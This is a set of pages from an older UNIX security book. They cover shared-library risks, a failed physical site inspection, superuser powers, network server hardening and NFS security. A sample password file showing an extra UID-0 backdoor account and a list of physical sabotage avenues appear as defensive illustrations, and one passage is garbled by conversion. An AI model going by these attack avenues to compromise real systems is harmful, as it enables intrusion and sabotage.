[Chapter 11] 11.6 Protecting Your System<br />

NOTE: As noted earlier, if you're using NFS, be sure to add the -local or -xdev option to each of the<br />

find commands above and run them on each of your servers, or use the fstype/prune options.<br />

11.6.1.3 World-readable backup devices<br />

Your tape drive should not be world readable. Otherwise, it allows any user to read the contents of any tape that<br />

happens to be in the tape drive. This scenario can be a significant problem for sites which do backups overnight,<br />

and then leave the tape in the drive until morning. During the hours that the tape is awaiting removal, any user can<br />

read the contents of any file on the tape.<br />

11.6.2 Shared Libraries<br />

Programs that depend on shared libraries are vulnerable to a variety of attacks that involve switching the shared<br />

library that the program is running. If your system has dynamic libraries, they need to be protected to the same<br />

level as the most sensitive program on your system, because modifying those shared libraries can alter the<br />

operation of every program.<br />

On some systems, additional shared libraries may be specified through the use of environment variables. While<br />

this is a useful feature on some occasions, the system's shared libraries should not be superseded for the following<br />

kinds of programs:<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Programs executed by SUID programs<br />

User shells<br />

Network servers<br />

<strong>Sec</strong>urity services<br />

Auditing and logging processes<br />

On some versions of <strong>UNIX</strong>, you can disable shared libraries by statically linking the executable program. On<br />

others, you can limit whether alternate shared libraries are referenced by setting additional mode bits inside the<br />

executable image. We advise you to take these precautions when available.<br />

11.5 Protecting Yourself 12. Physical <strong>Sec</strong>urity<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch11_06.htm (3 of 3) [2002-04-12 10:45:33]


[Chapter 12] 12.4 Story: A Failed Site Inspection<br />

Chapter 12<br />

Physical <strong>Sec</strong>urity<br />

12.4 Story: A Failed Site Inspection<br />

Catherine Aird, as quoted in the Quote of the Day mailing list (qotd-request@ensu.ucalgary.edu), wrote:<br />

"If...you can't be a good example, then you'll just have to be a horrible warning."<br />

Recently, a consumer-products firm with world-wide operations invited one of the authors to a casual<br />

tour of one of the company's main sites. The site, located in an office park with several large buildings,<br />

included computers for product design and testing, nationwide management of inventory, sales, and<br />

customer support. It included a sophisticated, automated voice-response system costing thousands of<br />

dollars a month to operate; hundreds of users; and dozens of T1 (1.44 Mbits/sec) communications lines<br />

for the corporate network, carrying both voice and data communications.<br />

The company thought that it had reasonable security - given the fact that it didn't have anything to lose.<br />

After all, the firm was in the consumer-products business. No government secrets or high-stakes stock<br />

and bond trading here.<br />

12.4.1 What We Found ...<br />

After our inspection, the company had some second thoughts about its security. Even without a formal<br />

site audit, the following items were discovered during our short visit.<br />

12.4.1.1 Fire hazards<br />

●<br />

●<br />

All of the company's terminal and network cables were suspended from hangers above false<br />

ceilings throughout the buildings. Although smoke detectors and sprinklers were located below the<br />

false ceiling, none were located above, where the cables were located. If there were a short or an<br />

electrical fire, it could spread throughout a substantial portion of the wiring plant and be very<br />

difficult, if not impossible, to control. No internal firestops had been built for the wiring channels,<br />

either.<br />

Several of the fire extinguishers scattered throughout the building had no inspection tags, or were<br />

shown as being overdue for an inspection.<br />

12.4.1.2 Potential for eavesdropping and data theft<br />

●<br />

Network taps throughout the buildings were live and unprotected. An attacker with a laptop<br />

computer could easily penetrate and monitor the network; alternatively, with a pair of scissors or<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch12_04.htm (1 of 3) [2002-04-12 10:45:34]


[Chapter 12] 12.4 Story: A Failed Site Inspection<br />

●<br />

●<br />

●<br />

●<br />

wirecutters, an attacker could disable portions of the corporate network.<br />

An attacker could get above the false ceiling through conference rooms, bathrooms, janitor's<br />

closets, and many other locations throughout the building, thereby gaining direct access to the<br />

company's network cables. A monitoring station (possibly equipped with a small radio transmitter)<br />

could be left in such a location for an extended period of time.<br />

Many of the unused cubicles had machines that were not assigned to a particular user, but were<br />

nevertheless live on the network. An attacker could sit down at a machine, gain system privileges,<br />

and use that machine as a point for further attacks against the information infrastructure.<br />

The company had no controls or policies on modems, thus allowing any user to set up a private<br />

SLIP or PPP connection to bypass the firewall.<br />

Several important systems had their backup tapes unprotected, left on a nearby table or shelf.<br />

12.4.1.3 Easy pickings<br />

●<br />

●<br />

●<br />

●<br />

●<br />

None of the equipment had any inventory-control stickers or permanent markings. If the<br />

equipment were stolen, it would not be recoverable.<br />

There was no central inventory of equipment. If items were lost, stolen, or damaged, there was no<br />

way to determine the extent and nature of the loss.<br />

Only one door to the building had an actual guard in place. People could enter and leave with<br />

equipment through other doors.<br />

When we arrived outside a back door with our hands full, a helpful employee opened the door and<br />

held it for us without requesting ID or proof that we should be allowed inside.<br />

Strangers walking about the building were not challenged. Employees did not wear tags and<br />

apparently made the assumption that anybody on the premises was authorized to be there.<br />

12.4.1.4 Physical access to critical computers<br />

●<br />

●<br />

●<br />

Internal rooms with particularly sensitive equipment did not have locks on the doors.<br />

Although the main computer room was protected with a card key entry system, entry could be<br />

gained from an adjacent conference room or hallway under the raised floor.<br />

Many special-purpose systems were located in workrooms without locks on the doors. When users<br />

were not present, the machines were unmonitored and unprotected.<br />

12.4.1.5 Possibilities for sabotage<br />

●<br />

●<br />

The network between two buildings consisted of a bidirectional, fault-tolerant ring network. But<br />

the fault tolerance was compromised because both fibers were routed through the same,<br />

unprotected conduit.<br />

The conduit between two buildings could be accessed through an unlocked manhole in the parking<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch12_04.htm (2 of 3) [2002-04-12 10:45:34]


[Chapter 12] 12.4 Story: A Failed Site Inspection<br />

lot. An attacker located outside the buildings could easily shut down the entire network with heavy<br />

cable cutters or a small incendiary device.<br />

12.4.2 "Nothing to Lose?"<br />

Simply by walking through this company's base of operations, we discovered that this company would be<br />

an easy target for many attacks - both complicated and primitive. The attacker might be a corporate spy<br />

for a competing firm, or might simply be a disgruntled employee. Given the ease of stealing computer<br />

equipment, the company also had reason to fear less-than-honest employees. Without adequate inventory<br />

or other controls, the company might not be able to discover and prove any wide-scale fraud, nor would<br />

they be able to recover insurance in the event of any loss.<br />

Furthermore, despite the fact that the company thought that it had "nothing to lose," an internal estimate<br />

had put the cost of computer downtime at several million dollars per hour because of its use in<br />

customer-service management, order processing, and parts management. An employee, out for revenge<br />

or personal gain, could easily put a serious dent into this company's bottom line with a small expenditure<br />

of effort, and little chance of being caught.<br />

Indeed, the company had a lot to lose.<br />

What about your site?<br />

12.3 Protecting Data 13. Personnel <strong>Sec</strong>urity<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch12_04.htm (3 of 3) [2002-04-12 10:45:34]


[Chapter 13] 13.3 Outsiders<br />

13.3 Outsiders<br />

Chapter 13<br />

Personnel <strong>Sec</strong>urity<br />

Visitors, maintenance personnel, contractors, vendors, and others may all have temporary access to your<br />

location and to your systems. They are people too, and could be a part of that 100% pool we mentioned<br />

at the beginning of this chapter. You should consider how everything we discussed earlier can be applied<br />

to these people with temporary access. At the very least, no one from the outside should be allowed<br />

unrestricted physical access to your computer and network equipment.<br />

13.2 On the Job IV. Network and <strong>Internet</strong><br />

<strong>Sec</strong>urity<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch13_03.htm [2002-04-12 10:45:34]


[Chapter 6] 6.3 The Enigma Encryption System<br />

Chapter 6<br />

Cryptography<br />

6.3 The Enigma Encryption System<br />

To understand how some modern encryption programs work, consider the raison d'être for the birth of<br />

computers in the first place: the Enigma encryption device, used by the Germans during the <strong>Sec</strong>ond<br />

World War. A photograph of an Enigma encryption device appears in Figure 6.2.<br />

Figure 6.2: An Enigma machine (photo courtesy Smithsonian Institution)<br />

Enigma was developed in the early 1900s in Germany by Arthur Scherbius and used throughout World<br />

War II. The Enigma encryption machine, illustrated in the photo, consisted of a battery, a push-button for<br />

every letter of the alphabet, a light for every letter of the alphabet, and a set of turnable discs called<br />

rotors. The Enigma machine was similar to a child's toy: pressing a button lit a different light. If you<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch06_03.htm (1 of 3) [2002-04-12 10:45:35]


[Chapter 6] 6.3 The Enigma Encryption System<br />

turned one of the rotors, the correspondence between buttons and lights changed.<br />

The rotors were crucial to the machine's cryptographic abilities. Each rotor on the Enigma machine was<br />

similar to a sandwich, with 52 metal contacts on each side. Inside the rotors, shown schematically in<br />

Figure 6.3, were 52 wires, each wire connecting a pair of contacts, one on either side of the rotor. Instead<br />

of directly connecting the contacts on one side with those on the other side, the wires scrambled the<br />

order, so that, for example, contact #1 on the left might be connected with contact #15 on the right, and<br />

so on.<br />

Figure 6.3: Diagram of an Enigma rotor<br />

Enigma placed three of these rotors side by side. At the end of the row of rotors was a reflector, which<br />

sent the electrical signal back through the machine for a second pass. (Four rotors were used near the end<br />

of the war.) Half of the 52 contacts were connected with a push-button and the battery; the other half<br />

were connected with the lights. Each button closed a circuit, causing a light to brighten; however,<br />

precisely which light brightened depended on the positioning of the three rotors and the reflector.<br />

To encrypt or decrypt a message, a German code clerk would set the rotors to a specific starting<br />

position - the key. For each letter, the code clerk would then press the button, write down which letter lit,<br />

and then advance the rotors. Because the rotors were advanced after every letter, the same letter<br />

appearing twice in the plaintext would usually be encrypted to two different letters in the ciphertext.<br />

Enigma was thus a substitution cipher with a different set of substitutions for each letter in the message;<br />

these kinds of ciphers are called polyalphabetic ciphers. The letter Z was used to represent a space;<br />

numbers were spelled out. Breaking an encrypted message without knowing the starting rotor position<br />

was a much more difficult task.<br />

6.2 What Is Encryption? 6.4 Common Cryptographic<br />

Algorithms<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch06_03.htm (2 of 3) [2002-04-12 10:45:35]


[Chapter 6] 6.3 The Enigma Encryption System<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch06_03.htm (3 of 3) [2002-04-12 10:45:35]


[Chapter 17] 17.4 <strong>Sec</strong>urity Implications of Network Services<br />

Chapter 17<br />

TCP/IP Services<br />

17.4 <strong>Sec</strong>urity Implications of Network Services<br />

Network servers are the portals through which the outside world accesses the information stored on your<br />

computer. Every server must:<br />

●<br />

●<br />

●<br />

Determine what information or action the client requests.<br />

Decide whether or not the client is entitled to the information, optionally authenticating the person<br />

(or program) on the other side of the network that is requesting service.<br />

Transfer the requested information or perform the desired service.<br />

By their design, many servers must run with root privileges. A bug or an intentional back door built into<br />

a server can therefore compromise the security of an entire computer, opening the system to any user of<br />

the network who is aware of the flaw. Even a relatively innocuous program can be the downfall of an<br />

entire computer. Flaws may remain in programs distributed by vendors for many years, only to be<br />

uncovered some time in the future.<br />

Furthermore, many <strong>UNIX</strong> network servers rely on IP numbers or hostnames to authenticate incoming<br />

network connections. This approach is fundamentally flawed, as neither the IP protocol nor DNS were<br />

designed to be resistant to attack. There have been many reports of computers that have fallen victim to<br />

successful IP spoofing attacks or DNS compromise.<br />

Given these factors, you may wish to adopt one or more of the following strategies to protect your<br />

servers and data:<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Use encryption to protect your data. If it is stolen, the data will do your attacker no good.<br />

Furthermore, making alterations in your data that you will not notice will be difficult, if not<br />

impossible.<br />

Avoid using passwords and host-based authentication. Instead, rely on tokens, one-time<br />

passwords, or cryptographically secure communications.<br />

Use a firewall to isolate your internal network from the outside world.<br />

Disconnect your internal network from the outside world. You can still relay electronic mail<br />

between the two networks using UUCP or some other mechanism. Set up separate network<br />

workstations to allow people to access the WWW or other <strong>Internet</strong> services.<br />

Create a second internal network for the most confidential information.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch17_04.htm (1 of 3) [2002-04-12 10:45:36]


[Chapter 17] 17.4 <strong>Sec</strong>urity Implications of Network Services<br />

Bringing Up an <strong>Internet</strong> Server Machine: Step-by-Step<br />

Although every site is unique, you may find the following step-by-step list helpful in bringing up new<br />

servers as securely as possible:<br />

1.<br />

2.<br />

3.<br />

4.<br />

5.<br />

6.<br />

7.<br />

8.<br />

9.<br />

10.<br />

11.<br />

12.<br />

●<br />

Don't physically connect to the network before you perform all of the following steps. Because<br />

some network access may be needed to FTP patches, for example, you may need to connect as<br />

briefly as possible in single-user mode (so there are no daemons running), fetch what you need,<br />

disconnect physically, and then follow steps 2-12.<br />

Erase your computer's hard disk and load a fresh copy of your operating system.<br />

Locate and load all security-related patches. To find the patches, check with both your vendor and<br />

with CERT's FTP server, ftp.cert.org.<br />

Modify your computer's /etc/syslog.conf file so that logs are stored both locally and on your<br />

organization's logging host.<br />

Configure as few user accounts as necessary. Ideally, users should avoid logging into your <strong>Internet</strong><br />

server.<br />

If your server is a mail server, then you may wish to have your users read their mail with POP.<br />

You will need to create user accounts, but give each user a /bin/nologin (or a shell script that<br />

simply prints a "no logins allowed" message) as their shell to prevent logins.<br />

Check all /etc/rc* and other system initialization files, and remove daemons you don't want<br />

running. (Use netstat to see what services are running.)<br />

Look through /etc/inetd.conf and disable all unneeded services. Protect the remaining services with<br />

tcpwrapper or a similar program.<br />

Add your own server programs to the system. Make sure that each one is based on the most<br />

up-to-date code.<br />

Get and install Tripwire, so you can tell if any files have been modified as the result of a<br />

compromise. (See Chapter 9, Integrity Management, for details.)<br />

Get and run Tiger to look for other problems.<br />

Monitor your system. Make sure that log files aren't growing out of control. Use the last command<br />

to see if people have logged in. Be curious.<br />

Disable all services that you are not sure you need, and put wrappers around the rest to log<br />

connections and restrict connectivity.<br />

17.3 Primary <strong>UNIX</strong> Network<br />

Services<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch17_04.htm (2 of 3) [2002-04-12 10:45:36]<br />

17.5 Monitoring Your<br />

Network with netstat


[Chapter 17] 17.4 <strong>Sec</strong>urity Implications of Network Services<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch17_04.htm (3 of 3) [2002-04-12 10:45:36]


[Chapter 4] 4.2 Special Usernames<br />

Chapter 4<br />

Users, Groups, and the<br />

Superuser<br />

4.2 Special Usernames<br />

In addition to regular users, <strong>UNIX</strong> comes with a number of special users that exist for administrative and<br />

accounting purposes. We've already mentioned some of these users. The most important of them is root,<br />

the superuser.<br />

4.2.1 The Superuser<br />

Every <strong>UNIX</strong> system comes with a special user in the /etc/passwd file with a UID of 0. This user is<br />

known as the superuser and is normally given the username root. The password for the root account is<br />

usually called simply the "root password."<br />

The root account is the identity used by the operating system itself to accomplish its basic functions, such<br />

as logging users in and out of the system, recording accounting information, and managing input/output<br />

devices. For this reason, the superuser exerts nearly complete control over the operating system: nearly<br />

all security restrictions are bypassed for any program that is run by the root user, and most of the checks<br />

and warnings are turned off.<br />

4.2.1.1 Any username can be the superuser<br />

As we noted in the section <strong>Sec</strong>tion 4.1, "Users and Groups" Although every <strong>UNIX</strong> user has a username<br />

of up to eight characters long, inside the computer <strong>UNIX</strong> represents each user by a single number: the<br />

user identifier (UID). Usually, the <strong>UNIX</strong> system administrator gives every user on the computer a<br />

different UID. <strong>UNIX</strong> also uses special usernames for a variety of system functions. As with usernames<br />

associated with human users, system usernames usually have their own UIDs as well. Here are some<br />

common "users" on various versions of <strong>UNIX</strong>:">" earlier in this chapter, any account which has a UID of<br />

0 has superuser privileges. The username root is merely a convention. Thus, in the following sample<br />

/etc/passwd file, both root and beth can execute commands without any security checks:<br />

root:zPDeHbougaPpA:0:1:Operator:/:/bin/ksh<br />

beth:58FJ32JK.fj3j:0:101:Beth Cousineau:/u/beth:/bin/csh<br />

rachel:eH5/.mj7NB3dx:181:100:Rachel Cohen:/u/rachel:/bin/ksh<br />

You should immediately be suspicious of accounts on your system which have a UID of 0 that you did<br />

not install; accounts such as these are frequently added by people who break into computers so that they<br />

will have a simple way of obtaining superuser access in the future.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch04_02.htm (1 of 5) [2002-04-12 10:45:36]


[Chapter 4] 4.2 Special Usernames<br />

4.2.1.2 Superuser is not for casual use<br />

The root account is not an account designed for the personal use of the system administrator. Because all<br />

security checks are turned off for the superuser, a typing error could easily trash the entire system.<br />

The <strong>UNIX</strong> system administrator will frequently have to become the superuser to perform various system<br />

administration tasks. This change in status can be completed using the su command (discussed later in<br />

this chapter) to spawn a privileged shell. Extreme caution must be exercised when operating with<br />

superuser capabilities. When the need for superuser access has ended, the system administrator should<br />

exit from the privileged shell.<br />

NOTE: Many versions of <strong>UNIX</strong> allow you to configure certain terminals so that users can't<br />

log in as the superuser from the login: prompt. Anyone who wishes to have superuser<br />

privileges must first log in as himself or herself and then su to root. This feature makes<br />

tracking who is using the root account easier, because the su command logs the username of<br />

the person who runs it and the time that it was run.[7] The feature also adds to overall<br />

system security, because people will need to know two passwords to gain superuser access<br />

to your system.<br />

In general, most <strong>UNIX</strong> systems today are configured so that the superuser can log in with<br />

the root account on the system console, but not on other terminals. We describe this<br />

technique in the section called <strong>Sec</strong>tion 4.3.6, "Restricting su" later in this chapter.<br />

Even if your system allows users to log directly into the root account, we recommend that<br />

you institute rules that require users to first log into their own accounts and then use the su<br />

command.<br />

4.2.1.3 What the superuser can do<br />

Any process that has an effective UID of 0 (see "Real and Effective User IDs" later in this chapter) runs<br />

as the superuser - that is, any process with a UID of 0 runs without security checks and is allowed to do<br />

almost anything. Normal security checks and constraints are ignored for the superuser, although most<br />

systems do audit and log some of the superuser's actions.<br />

Some of the things that the superuser can do include:<br />

Process Control:<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Change the nice value of any process (see the section "Process priority and niceness" in Appendix<br />

C, <strong>UNIX</strong> Processes).<br />

Send any signal to any process (see "Signals" in Appendix C).<br />

Alter "hard limits" for maximum CPU time as well as maximum file, data segment, stack segment,<br />

and core file sizes (see Chapter 11, Protecting Against Programmed Threats).<br />

Turn accounting on and off (see Chapter 10).<br />

Bypass login restrictions prior to shutdown. (Note: this may not be possible if you have configured<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch04_02.htm (2 of 5) [2002-04-12 10:45:36]


[Chapter 4] 4.2 Special Usernames<br />

●<br />

●<br />

your system so that the superuser cannot log into terminals.)<br />

Change his or her process UID to that of any other user on the system.<br />

Log out all users and shutdown or reboot the system.<br />

Device Control:<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Access any working device.<br />

Shut down the computer.<br />

Set the date and time.<br />

Read or modify any memory location.<br />

Create new devices (anywhere in the filesystem) with the mknod command.<br />

Network Control:<br />

●<br />

●<br />

●<br />

Run network services on "trusted" ports (see Chapter 17, TCP/IP Services).<br />

Reconfigure the network.<br />

Put the network interface into "promiscuous mode" and examine all packets on the network<br />

(possible only with some kinds of network interfaces).<br />

Filesystem Control:<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Read, modify, or delete any file or program on the system (see Chapter 5, The <strong>UNIX</strong> Filesystem).<br />

Run any program.[8]<br />

[8] If a program has a file mode of 000, root must set the execute bit of the program<br />

with the chmod() system call before the program can be run, although shell scripts<br />

can be run by feeding their input directly into /bin/sh.<br />

Change a disk's electronic label.[9]<br />

[9] Usually stored on the first 16 blocks of a hard disk or floppy disk formatted with<br />

the <strong>UNIX</strong> filesystem.<br />

Mount and unmount filesystems.<br />

Add, remove, or change user accounts.<br />

Enable or disable quotas and accounting.<br />

Use the chroot() system call, which changes a process's view of the filesystem root directory.<br />

Write to the disk after it is "100 percent" full. (The Berkeley Fast Filesystem and the Linux ext2<br />

File System both allow the reservation of some minfree amount of the disk. Normally, a report that<br />

a disk is 100% full implies that there is still 10% left. Although this space can be used by the<br />

superuser, it shouldn't be: filesystems run faster when their disks are not completely filled.)<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch04_02.htm (3 of 5) [2002-04-12 10:45:36]


[Chapter 4] 4.2 Special Usernames<br />

4.2.1.4 What the superuser can't do<br />

Despite all of the powers listed above, there are some things that the superuser can't do, including:<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Make a change to a filesystem that is mounted read-only. (However, the su-peruser can make<br />

changes directly to the raw device, or unmount a read-only filesystem and remount it read/write,<br />

provided that the media is not physically write-protected.)<br />

Unmount a filesystem which contains open files, or in which some running process has set its<br />

current directory.[10]<br />

[10] Many BSD variants (including NetBSD and FreeBSD) provide an -f option to<br />

umount, which forcibly unmounts a busy filesystem.<br />

Write directly to a directory, or create a hard link to a directory (although these operations are<br />

allowed on some <strong>UNIX</strong> systems).<br />

Decrypt the passwords stored in the /etc/passwd file, although the superuser can modify the<br />

/bin/login and su system programs to record passwords when they are typed. The superuser can<br />

also use the passwd command to change the password of any account.<br />

Terminate a process that has entered a wait state inside the kernel, although the superuser can shut<br />

down the computer, effectively killing all processes.<br />

4.2.1.5 The problem with the superuser<br />

The superuser is the main security weakness in the <strong>UNIX</strong> operating system. Because the superuser can<br />

do anything, after a person gains superuser privileges - for example, by learning the root password and<br />

logging in as root - that person can do virtually anything to the system. This explains why most attackers<br />

who break into <strong>UNIX</strong> systems try to become superusers.<br />

Most <strong>UNIX</strong> security holes that have been discovered are of the kind that allow regular users to obtain<br />

superuser privileges. Thus, most <strong>UNIX</strong> security holes result in a catastrophic bypass of the operating<br />

system's security mechanisms. After a flaw is discovered and exploited, the entire computer is<br />

compromised.<br />

There are a number of techniques for minimizing the impact of such system compromises, including:<br />

●<br />

●<br />

●<br />

●<br />

Store your files on removable media, so that an attacker who gains superuser privileges will still<br />

not have access to critical files.<br />

Encrypt your files. Being the superuser grants privileges only on the <strong>UNIX</strong> system; it does not<br />

magically grant the mathematical prowess necessary to decrypt a well-coded file or the necessary<br />

clairvoyance to divine encryption keys. (Encryption is discussed in Chapter 6, Cryptography.)<br />

Mount disks read-only when possible.<br />

Keep your backups of the system current. This practice is discussed further in Chapter 7, Backups.<br />

There are many other defenses, too, and we'll continue to present them throughout this book.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch04_02.htm (4 of 5) [2002-04-12 10:45:36]


[Chapter 4] 4.2 Special Usernames<br />

Other operating systems - including Multics - obviate the superuser flaw by compartmentalizing the<br />

many system privileges which <strong>UNIX</strong> bestows on the root user. Indeed, attempts to design a "secure"<br />

<strong>UNIX</strong> (one that meets U.S. Government definitions of highly trusted systems) have adopted this same<br />

strategy of dividing superuser privileges into many different categories.<br />

Unfortunately, attempts at compartmentalization often fail. For example, Digital's VAX/VMS operating<br />

system divides system privileges into many different classifications. But many of these privileges can be<br />

used by a persistent person to establish the others: an attacker who achieves "physical I/O access" can<br />

modify the operating system's database to grant himself any other privilege that he desires. Thus, instead<br />

of a single catastrophic failure in security, we have a cascading series of smaller failures leading to the<br />

same end result. For compartmentalization to be successful, it must be carefully thought out.<br />

4.2.2 Other Special Users<br />

To minimize the danger of superuser penetration, many <strong>UNIX</strong> systems use other special user accounts to<br />

execute system functions that require special privileges - for example, to access certain files or<br />

directories - but that do not require superuser privileges. These special users are associated with<br />

particular system functions, rather than individual users.<br />

One very common special user is the uucp user, which is used by the UUCP system for transferring files<br />

and electronic mail between <strong>UNIX</strong> computers connected by telephone. When one computer dials another<br />

computer, it must first log in: instead of logging in as root, the remote computer logs in as uucp.<br />

Electronic mail that's awaiting transmission to the remote machine is stored in directories that are<br />

readable only by the uucp user so that other users on the computer can't access each other's personal mail.<br />

(See Chapter 15.)<br />

Other common special users include daemon, which is often used for network utilities, bin and sys,<br />

which are used for system files, and lp, which is used for the line printer system.<br />

4.2.3 Impact of the /etc/passwd and /etc/group Files on <strong>Sec</strong>urity<br />

From the point of view of system security, /etc/passwd is one of the <strong>UNIX</strong> operating system's most<br />

important files. (Another very important file is /dev/kmem, which, if left unprotected, can be used to read<br />

or write any address in the kernel's memory.) If you can alter the contents of /etc/passwd, you can change<br />

the password of any user or make yourself the superuser by changing your UID to 0.<br />

The /etc/group file is also very important. If you can change the /etc/group file, you can add yourself to<br />

any group that you wish. Often, by adding yourself to the correct group, you can eventually gain access<br />

to the /etc/passwd file, and thus achieve all superuser privileges.<br />

4.1 Users and Groups 4.3 su: Changing Who You<br />

Claim to Be<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch04_02.htm (5 of 5) [2002-04-12 10:45:36]


[Chapter 20] NFS<br />

20. NFS<br />

Contents:<br />

Understanding NFS<br />

Server-Side NFS <strong>Sec</strong>urity<br />

Client-Side NFS <strong>Sec</strong>urity<br />

Improving NFS <strong>Sec</strong>urity<br />

Some Last Comments<br />

Chapter 20<br />

In many environments, we want to share files and programs among many workstations in a local area<br />

network. Doing so requires programs that let us share the files, create new files, do file locking, and<br />

manage ownership correctly. Over the last dozen years there have been a number of network-capable<br />

filesystems developed by commercial firms and research groups. These have included Apollo Domain,<br />

the Andrew Filesystem (AFS), the AT&T Remote Filesystem (RFS), and Sun Microsystems' Network<br />

Filesystem (NFS). Each of these has had beneficial features and limiting drawbacks.<br />

Of all the network filesystems, NFS is probably the most widely used. NFS is available on almost all<br />

versions of <strong>UNIX</strong>, as well as on Apple Macintosh systems, MS-DOS, Windows, OS/2, and VMS. NFS<br />

has continued to mature, and we expect that Version 3 of NFS will help to perpetuate and expand its<br />

reach. For this reason, we will focus in this book on the security implications of running NFS on your<br />

<strong>UNIX</strong> systems. If you use one of the other forms of network filesystems, there are associated security<br />

considerations, many of which are similar to the ones we present here: be sure to consult your vendor<br />

documentation.<br />

20.1 Understanding NFS<br />

Using NFS, clients can mount partitions of a server as if they were physically connected to the client. In<br />

addition to simply allowing remote access to files over the network, NFS allows many (relatively)<br />

low-cost computer systems to share the same high-capacity disk drive at the same time. NFS server<br />

programs have been written for many different operating systems, which let users on <strong>UNIX</strong> workstations<br />

have remote access to files stored on a variety of different platforms. NFS clients have been written for<br />

microcomputers such as the IBM/PC and Apple Macintosh, giving PC users much of the same flexibility<br />

enjoyed by their <strong>UNIX</strong> coworkers, as well as a relatively easy method of data interchange.<br />

NFS is nearly transparent. In practice, a workstation user simply logs into the workstation and begins<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch20_01.htm (1 of 11) [2002-04-12 10:45:38]


[Chapter 20] NFS<br />

working, accessing it as if the files were locally stored. In many environments, workstations are set up to<br />

mount the disks on the server automatically at boot time or when files on the disk are first referenced.<br />

NFS also has a network mounting program that can be configured to mount the NFS disk automatically<br />

when an attempt is made to access files stored on remote disks.<br />

There are several basic security problems with NFS:<br />

●<br />

●<br />

●<br />

NFS is built on top of Sun's RPC (Remote Procedure Call), and in most cases uses RPC for user<br />

authentication. Unless a secure form of RPC is used, NFS can be easily spoofed.<br />

Even when <strong>Sec</strong>ure RPC is used, information sent by NFS over the network is not encrypted, and is<br />

thus subject to monitoring and eavesdropping. As we mention elsewhere, the data can be<br />

intercepted and replaced (thereby corrupting or Trojaning files being imported via NFS).<br />

NFS uses the standard <strong>UNIX</strong> filesystem for access control, opening the networked filesystem to<br />

many of the same problems as a local filesystem.<br />

One of the key design features behind NFS is the concept of server statelessness. Unlike several other<br />

systems, there is no "state" kept on a server to indicate that a client is performing a remote file operation.<br />

Thus, if the client crashes and is rebooted, there is no state in the server that needs to be recovered.<br />

Alternatively, if the server crashes and is rebooted, the client can continue operating on the remote file as<br />

if nothing really happened - there is no server-side state to recreate.[1] We'll discuss this concept further<br />

in later sections.<br />

[1] Actual implementations are not completely stateless, however, as we will see later in this<br />

chapter.<br />

20.1.1 NFS History<br />

NFS was developed inside Sun Microsystems in the early 1980s. Since that time, NFS has undergone<br />

three major revisions:<br />

NFS Version 1<br />

NFS Version 1 was Sun's prototype network filesystem. This version was never released to the<br />

outside world.<br />

NFS Version 2<br />

NFS Version 2 was first distributed with Sun's SunOS 2 operating system in 1985. Version 2 was<br />

widely licensed to numerous <strong>UNIX</strong> workstation vendors. A freely distributable, compatible<br />

version was developed in the late 1980s at the University of California at Berkeley.<br />

During its 10-year life, many subtle, undocumented changes were made to the NFS version 2<br />

specification. Some vendors allowed NFS version 2 to read or write more than 4K bytes at a time;<br />

others increased the number of groups provided as part of the RPC authentication from 8 to 16.<br />

Although these minor changes created occasional incompatibilities between different NFS<br />

implementations, NFS version 2 provided a remarkable degree of compatibility between systems<br />

made by different vendors.<br />

NFS Version 3<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch20_01.htm (2 of 11) [2002-04-12 10:45:38]


[Chapter 20] NFS<br />

The NFS Version 3 specification was developed during a series of meetings in Boston in July,<br />

1992.[2] Working code for NFS Version 3 was introduced by some vendors in 1995, and is<br />

expected to be widely available in 1996. Version 3 incorporates many performance improvements<br />

over Version 2, but does not significantly change the way that NFS works or the security model<br />

used by the network filesystem.<br />

[2] Pawlowski, Juszczak, Staubach, Smith, Lebel and Hitz, "NFS Version 3 Design<br />

and Implementation," USENIX Summer 1994 conference. The standard was later<br />

